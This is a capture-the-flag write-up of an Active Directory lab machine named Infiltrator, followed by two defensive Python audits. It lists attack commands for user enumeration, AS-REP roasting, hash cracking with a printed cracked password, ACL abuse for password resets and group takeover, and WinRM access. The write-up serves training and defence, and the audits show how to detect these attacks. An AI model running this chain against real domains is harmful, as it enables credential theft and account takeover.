
HTB Lab Writeup - Infiltrator

Views: 961 / 2024-10-22 17:56:01

nmap scan

nmap -A 10.10.11.31

Starting Nmap 7.94SVN (  ) at 2024-10-15 13:18 CST
Nmap scan report for  (10.10.11.31)
Host is up (0.46s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-title: 
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-10-15 05:18:56Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-10-15T05:21:33+00:00; -6s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-15T05:21:30+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-15T05:21:31+00:00; -4s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  globalcatLDAPssl?
|_ssl-date: 2024-10-15T05:21:30+00:00; -1s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:, DNS:, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
|_ssl-date: 2024-10-15T05:21:30+00:00; -4s from scanner time.
| ssl-cert: Subject: commonName=
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (85%)
Aggressive OS guesses: Microsoft Windows Server 2019 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -3s, deviation: 2s, median: -4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-15T05:20:57
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   624.86 ms 10.10.16.1
2   624.97 ms  (10.10.11.31)

OS and Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.82 seconds

The target is a domain controller (host DC01, domain infiltrator.htb).

Web enumeration

Looking at the web service on port 80, there is a team introduction page. Collect the team members' names; with F12 you can see they sit in h4 elements, which the following XPath extracts:

curl -s / | xmllint --html --xpath "//div/div/h4" -

<h4>.01 David Anderson</h4>
<h4>.02 Olivia Martinez</h4>
<h4>.03 Kevin Turner</h4>
<h4>.04 Amanda Walker</h4>
<h4>.05 Marcus Harris</h4>
<h4>.06 Lauren Clark</h4>
<h4>.07 Ethan Rodriguez</h4>

David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez

kerbrute domain user enumeration

Arrange the names collected above into candidate domain username formats:

david_anderson@
@
d_anderson@
@
olivia_martinez@
@
o_martinez@
@
kevin_turner@
@
k_turner@
@
amanda_walker@
@
a_walker@
@
marcus_harris@
@
m_harris@
@
lauren_clark@
@
l_clark@
@
ethan_rodriguez@
@
e_rodriguez@
@

kerbrute userenum --dc -d

AS-REP Roasting

impacket-GetNPUsers / -usersfile -outputfile -no-pass

$krb5asrep$23$@@:a1d4f31dcf6bc05a04dee51be421e533$0aa08870f1211e00c6db740e862bce466a86986da0fe451e8136c2ed02dc0749a729f85566ebc762e2f65ac62348f6c246dd22f1383a8b5b9ba0af2357252dd04f0359761f11ffcf00ad31f78e100df2e00b771ca041e156aac6400ad50849c55e21ca5e23f04336228446714cdbf54b8e0aee48749cf472d8cbcf06a752990077edfd9361c85d9c28bbd072379b66d6bddafa1f751c8f9ee6644a99fd89c7bb7900f66f7d83d3180fb04e91f3471a512987c18400b122251160730106144d1a18e91a1243f5b2c2ff50a2baa10dda423781df8a4301c723858c6d8d580591f3d2a70295a18298d1b519498e27db17544733

Hash cracking

hashcat

hashcat detects the hash as mode 18200 (Kerberos 5 AS-REP, etype 23); run it straight against rockyou.

hashcat -a 0 -m 18200 /usr/share/wordlists/

Cracked password: WAT?watismypass!

Credentials obtained: :WAT?watismypass!
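The AS-REP roasting step above works only because the roasted account has "Do not require Kerberos preauthentication" set, and the RC4 reply (etype 23) is what makes the hash cheap to crack. The following is an added example, not code from the writeup, showing the two checks a defender would run: an audit of userAccountControl for the DONT_REQ_PREAUTH bit, and a scan of Windows 4768 (TGT request) events for the no-pre-auth plus RC4 combination that a GetNPUsers run leaves behind. The account list and event records are constructed sample data; the underscore usernames are taken from the candidate list earlier on the page.

```python
# Added example (not part of the original writeup): defensive checks for the
# AS-REP roasting exposure abused above.
from dataclasses import dataclass

DONT_REQ_PREAUTH = 0x400000   # userAccountControl bit: no Kerberos pre-auth needed
ACCOUNTDISABLE = 0x0002       # userAccountControl bit: account disabled

# Constructed LDAP export sample: (sAMAccountName, userAccountControl).
SAMPLE_ACCOUNTS = [
    ("d_anderson", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("l_clark", 0x400200),     # NORMAL_ACCOUNT | DONT_REQ_PREAUTH -> roastable
    ("svc_legacy", 0x400202),  # DONT_REQ_PREAUTH but disabled -> not roastable
    ("e_rodriguez", 0x200),
]


def audit_preauth(accounts):
    """Return enabled accounts with pre-authentication disabled (roastable)."""
    return sorted(
        name for name, uac in accounts
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE
    )


@dataclass
class Event4768:
    """Fields of interest from a Windows Security event 4768 (TGT requested)."""
    account: str
    client_ip: str
    preauth_type: int   # 0 = no pre-auth, 2 = PA-ENC-TIMESTAMP, 15 = PKINIT
    etype: int          # 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96


# Constructed event sample. The 10.10.16.5 requests mimic a roasting tool:
# no pre-authentication, asking for an RC4-encrypted reply.
SAMPLE_EVENTS = [
    Event4768("l_clark", "10.10.16.5", 0, 0x17),
    Event4768("d_anderson", "10.10.11.31", 2, 0x12),
    Event4768("l_clark", "10.10.11.31", 2, 0x12),
    Event4768("o_martinez", "10.10.16.5", 0, 0x12),
]


def flag_asrep_events(events):
    """Return (account, client_ip, severity) for TGT requests made without pre-auth.

    An RC4 (0x17) reply is rated high because it is the cheap-to-crack case
    (hashcat 18200); an AES reply without pre-auth is still worth a look.
    """
    hits = []
    for ev in events:
        if ev.preauth_type != 0:
            continue
        severity = "high" if ev.etype == 0x17 else "medium"
        hits.append((ev.account, ev.client_ip, severity))
    return hits


if __name__ == "__main__":
    print("accounts without pre-auth:", audit_preauth(SAMPLE_ACCOUNTS))
    for account, ip, severity in flag_asrep_events(SAMPLE_EVENTS):
        print(f"[{severity}] AS-REP without pre-auth for {account} from {ip}")
```

The fix on the account side is to clear the DONT_REQ_PREAUTH flag (or disable unused accounts); on the detection side, alert when a single client IP produces pre-auth-type-0 requests for several accounts in a short window, since real clients do not request RC4 tickets without pre-authentication.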

Password reuse

SMB and WMI logins with this account fail, so the user itself is not very useful; check whether any other user reuses the password.


crackmapexec smb 10.10.11.35 -u -p 'WAT?watismypass!'

Credentials obtained: :WAT?watismypass!

This one also fails to connect.

BloodHound collection

Try collecting domain information:

bloodhound-python -d -u -p 'WAT?watismypass!' -c all --dns-tcp --zip --dns-timeout 10

Imported into BloodHound; nothing useful.

bloodhound-python -d -u -p 'WAT?watismypass!' -c all --dns-tcp --zip --dns-timeout 10

Importing this collection into BloodHound shows the user has GenericAll over the MARKETING DIGITAL OU. A user under that OU is a member of the MARKETING DIGITAL group, so we can reset that user's password.

GenericAll

First modify the ACL of the MARKETING DIGITAL OU so that our user holds FullControl over it. Get a Kerberos ticket first:

impacket-getTGT '/:WAT?watismypass!' -dc-ip 10.10.11.31

Then load the ticket:

export KRB5CCNAME=

Modify the permissions:

python3 AD/impacket/examples/ -action 'write' -rights 'FullControl' -inheritance -principal '' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' '/' -k -no-pass -dc-ip 10.10.11.31

Change the target user's password:

python3 --host "" -d "" --kerberos --dc-ip 10.10.11.31 -u "" -p "WAT?watismypass\!" set password "" "K@night666"

Looking at this user's information shows they hold AddSelf over the CHIEFS MARKETING group.

Add the user to the CHIEFS MARKETING group:

python3 AD/bloodyAD/ --host "" -d "" --dc-ip 10.10.11.31 -u -p "K@night666" -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB"

Looking at the CHIEFS MARKETING group's permissions, the group can force a password change on another user.

Use this user to change that user's password:

python3 AD/bloodyAD/ --host "" -d "" --kerberos --dc-ip 10.10.11.31 -u "" -p "K@night666" set password "" "K@night666"
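The chain just walked (GenericAll on an OU, password reset of a user in it, AddSelf on a group, then a forced password change) is exactly the kind of ACL path BloodHound draws. As an added example, not code from the writeup or from BloodHound, the block below audits a constructed directory snapshot for dangerous rights held by non-admin principals and walks the resulting takeover graph, so a defender can see what a single cracked account reaches before the attacker does. Only the OU and group names come from the page; user1, user2 and user3 stand in for the account names the writeup elides, and the ACE list is constructed.

```python
# Added example (not part of the original writeup): audit of an AD ACL snapshot
# for the abuse chain above. Object names and ACEs are constructed sample data;
# only MARKETING DIGITAL and CHIEFS MARKETING come from the page.
from collections import defaultdict, deque

DANGEROUS_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
    "AddSelf", "AddMember", "ForceChangePassword", "AllExtendedRights",
}
# Rights on a container (OU or domain root) that let the holder rewrite the
# DACL of every object beneath it, as the dacledit step above does.
CONTAINER_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner"}
PRIVILEGED = {"DOMAIN ADMINS", "ENTERPRISE ADMINS", "ADMINISTRATORS"}

# Constructed directory snapshot: name -> distinguishedName.
OBJECTS = {
    "user1": "CN=user1,CN=USERS,DC=INFILTRATOR,DC=HTB",
    "user2": "CN=user2,OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB",
    "user3": "CN=user3,CN=USERS,DC=INFILTRATOR,DC=HTB",
    "MARKETING DIGITAL": "CN=MARKETING DIGITAL,CN=USERS,DC=INFILTRATOR,DC=HTB",
    "CHIEFS MARKETING": "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB",
    "DOMAIN ADMINS": "CN=DOMAIN ADMINS,CN=USERS,DC=INFILTRATOR,DC=HTB",
}
# Constructed ACEs: (principal, right, target DN).
SAMPLE_ACES = [
    ("user1", "GenericAll", "OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB"),
    ("user2", "AddSelf", "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB"),
    ("CHIEFS MARKETING", "ForceChangePassword", "CN=user3,CN=USERS,DC=INFILTRATOR,DC=HTB"),
    ("user3", "ReadProperty", "CN=user1,CN=USERS,DC=INFILTRATOR,DC=HTB"),
    ("DOMAIN ADMINS", "GenericAll", "DC=INFILTRATOR,DC=HTB"),
]
# Constructed group memberships: (member, group).
SAMPLE_MEMBERSHIPS = [("user2", "MARKETING DIGITAL")]


def find_risky_aces(aces):
    """Dangerous rights held by anything other than a built-in admin group."""
    return sorted((p, r, t) for p, r, t in aces
                  if r in DANGEROUS_RIGHTS and p.upper() not in PRIVILEGED)


def build_edges(objects, aces, memberships):
    """Turn ACEs and memberships into 'principal can take over node' edges.

    A container right fans out to every object under that OU/domain; a right on
    a user or group is an edge to that object. This deliberately over-approximates
    (e.g. AddSelf on a user is treated like any other dangerous right) so that
    the audit errs on the side of showing a path.
    """
    edges = defaultdict(set)
    for principal, right, target in aces:
        if right not in DANGEROUS_RIGHTS:
            continue
        t = target.upper()
        if t.startswith(("OU=", "DC=")):
            if right not in CONTAINER_RIGHTS:
                continue
            for name, dn in objects.items():
                if dn.upper().endswith("," + t) and name != principal:
                    edges[principal].add(name)
        else:
            for name, dn in objects.items():
                if dn.upper() == t and name != principal:
                    edges[principal].add(name)
    for member, group in memberships:
        edges[member].add(group)   # a member inherits the group's rights
    return edges


def reachable(edges, start):
    """Every object a principal can take over by following the edges (BFS)."""
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for nxt in edges.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    seen.discard(start)
    return sorted(seen)


EDGES = build_edges(OBJECTS, SAMPLE_ACES, SAMPLE_MEMBERSHIPS)

if __name__ == "__main__":
    for principal, right, target in find_risky_aces(SAMPLE_ACES):
        print(f"{principal} has {right} on {target}")
    print("user1 can take over:", reachable(EDGES, "user1"))
```

Each ACE the audit prints is a remediation item: remove the right, or re-scope it to a dedicated admin group. Re-running the walk after each removal shows whether the cracked account still reaches anything.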

evil-winrm

Using that user, connect with evil-winrm to get the

Privilege escalation

There is an archive containing the MySQL root password; with it you can read the Administrator user's directly (the shared environment is too unstable, so this is not demonstrated here).